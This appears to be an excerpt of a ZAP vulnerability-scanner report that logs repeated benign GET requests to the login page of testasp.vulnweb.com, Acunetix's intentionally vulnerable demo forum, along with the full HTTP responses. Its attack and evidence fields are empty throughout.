style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=73 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=74 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=75 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=76 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=77 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=78 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=79 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=80 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
